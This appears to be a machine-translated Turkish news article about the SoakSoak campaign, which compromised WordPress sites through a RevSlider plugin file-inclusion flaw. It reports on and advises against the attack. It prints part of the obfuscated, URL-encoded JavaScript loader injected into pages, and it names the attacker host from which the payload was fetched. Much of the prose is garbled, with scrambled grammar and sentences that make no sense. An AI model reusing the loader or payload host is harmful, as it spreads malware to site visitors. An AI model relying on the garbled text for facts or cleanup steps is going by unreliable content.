Daha fazla 100 000 WordPress'in içerik yönetim sistemi üzerinde çalışan web siteleri son zamanlarda gizemli kötü amaçlı yazılım bulaşmış olan. Bir kez siteler saldırıların platformlar haline enfekte, izleyiciler tarafından girilen web sayfalarına zararlı kodları yükleniyor.
Güvenlik araştırmacıları bu kötü amaçlı yazılım kampanya Google işareti daha yaptığını teyit 11 000 zararlı olarak etki. Bu kampanya SoakSoak seçildi, saldırıya uğradığını ilk etki alanından sonra. web sitesi operatörlerinin ancak onların güvenli sunuculara yardımcı Sucuri Şirkete göre, varlık uzlaşma olarak tespit edilmiştir diğer birçok site var. Sucuri gelen güvenlik uzmanları enfeksiyon RevSlider olarak bilinen kötü amaçlı yazılım saldırısı dizisine bir güvenlik açığının neden olduğunu öğrendim. Bu bir WordPress eklentisi Eylül başında birkaç yeraltı forumlar yoluyla ifşa edilmiş olan. Uzmanlar bu açığı Yerel Dosya İçerme saldırısı olarak bilinir söylemek, hangi saldırganın sunucuda yerel dosyaya erişmek ve indirmenize olanak. Böyle açıkları derhal dizildi gerekmektedir.
Sucuri şirket her web sayfasında bir çok Karartılmış saldırı kodunu yüklemek için virüslü siteler neden olan bir saldırı gözlemlemiş ve bu kod aşağıdaki bileşenini içerir:
→(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));
Bu özel kod sayfaları zararlı yükü indirmek yapar hxxp: //soaksoak.ru/xteas/code. kullanıcıların yorumlarına dayanarak, web sitelerinin bazı yöneticileri izlemek siteleri enfekte olduğunu anlamak için şaşırdık. Bu web sitelerinden dezenfeksiyon işlemi bulunan bir komut dosyasına eklenir zararlı kod kaldırılmasını gerektiren / şablon loader.php wp-includes. Bu sitede her sayfaya yüklenmeden olabilir bir JavaScript dosyası yapar. Bir kez bu kötü amaçlı yazılım yükleyebilir deşifre.
eklenti Slider Devrimi kullanmak olur WordPress platformu tüm yöneticilerine, güncelleştirilmiş olduğundan emin olmak gerekir. Yine de, zararlı yazılım araştırmacıları zor tüm web siteleri evrensel biçimde düzeltmeyi uygulamak almak bulmak. eklenti RevSlider prim eklentidir şekilde budur, Kolayca yükseltilmiş ve birşey değil bu nedenle bu eklenti web sitesinin sahibi için tehlikeli hale. web sitesi sahiplerinin bir kısmı aslında çevrelerindeki bu eklenti sahip bilmiyorum gibi daha ciddileşiyor, onların temalar ile bir paket içinde geliyor olarak.
Çeşitli arka kapı yükleri kullanarak çalışır SoakSoak zararlı yazılım kampanya, resim veya metin enjekte. Onlar uzun bir süre için web sitesi üzerinden kontrol için yeni yönetici kullanıcıları yüklemek ve böylece izin için kullanılabilir.
Sucuri şirketten güvenlik uzmanları ayrıca bu tür WPtouch gibi diğer WordPress eklentileri de güvenlik sorunları bulduk belirtti (5,670,626 İndirilenler), Disqus (1,400,003 İndirilenler), All in One SEO pakette (19,152,355 İndirilenler), ve MailPoet Bültenleri (1,894,474 İndirilenler).
Güvenlik uzmanları da zararlı siteler temizlik kolay olmadığına dikkat. Bunlar belirli önerileri enfeksiyon kaldırmak amacıyla swfobject.js ve şablon-loader.php dosyaları değiştirmek için kullanıcılar çevrimiçi o tavsiye olduğunu unutmayın. Bu etkinlik ancak bir garanti değildir, o enfeksiyon kaldıracaktır olarak, ancak ilk etapta kullanılan arka kapı ve giriş noktalarını kapatmak olmaz ve dolayısıyla web sitesi tekrar enfekte edilebilir. kötü niyetli saldırılar sadece temizlenecek gerekmez ama aynı zamanda durdurulmalıdır. Bu web sitesi güvenlik duvarı tarafından yapılabilirdi, kötü amaçlı yazılım tarafından olası saldırıları azaltabilir.
güvenlik uzmanları en son sürüme güncelleme ve daha sonra kontrol edebilir ve diğer enfeksiyonları önlemek için kendi veritabanından yönetici kullanıcı listesini temizlemek etmeye teşvik.